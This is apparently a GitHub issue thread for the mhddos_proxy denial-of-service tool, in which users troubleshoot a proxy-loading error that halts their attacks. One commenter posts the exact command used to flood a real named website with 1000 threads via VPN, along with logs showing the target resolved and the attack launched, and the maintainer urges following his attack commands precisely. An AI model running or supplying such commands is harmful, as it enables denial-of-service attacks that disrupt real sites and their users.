### ISSUE TITLE
No working proxies found - stopping the attac

### ISSUE THREAD

**Issue by xiaojiu1205** [porthole-ascend-cinnamon/mhddos_proxy#183]
No working proxies found - stopping the attac

What happend,Who can tell me.

**Comment by FluxState** [comment]
Same here.
```
    proxies = obtain_proxies(raw.decode())
  File "<string>", line 67, in O0O0O0OO0O0O0000
  File "<string>", line 1, in O0O0O0OO0O00OOO00
RuntimeError
```

**Comment by FluxState** [comment]
No change.

**Comment by porthole-ascend-cinnamon** [comment]
@FluxState provide a screenshot with command visible. I am 90% sure you've again digressed from the commands I've provided. Your fork won't work - follow the commands precisely.

**Comment by FluxState** [comment]
@porthole-ascend-cinnamon 

build/install: https://github.com/FluxState/ptndown-mhddos-pia/blob/main/Dockerfile
fork (only external dnss removed): https://github.com/FluxState/mhddos_proxy/blob/local-resolver-2/src/dns_utils.py

command:
```
(venv) root@24026c6447a0:/opt/mhddos_proxy# ./runner.sh /opt/venv/bin/python3 --http-methods RGET --lang en --vpn --threads 1000 https://360tv.ru

---------------------Auto-update enabled---------------------

- Complete documentation: - https://github.com/porthole-ascend-cinnamon/mhddos_proxy

[20:00:12 - INFO] `uvloop` activated successfully (increased network efficiency)
[20:00:12 - INFO] Launching the attack...

[20:00:17 - INFO] 360tv.ru resolved to 78.155.198.131
[20:00:17 - ERROR] Error while loading system proxies.
Traceback (most recent call last):
  File "/opt/mhddos_proxy/src/proxies.py", line 149, in load_system_proxies
    proxies = obtain_proxies(raw.decode())
  File "<string>", line 67, in O0O0O0OO0O0O0000
  File "<string>", line 1, in O0O0O0OO0O00OOO00
RuntimeError
[20:00:17 - ERROR] No working proxies found - stopping the attack
```

happens in Docker only
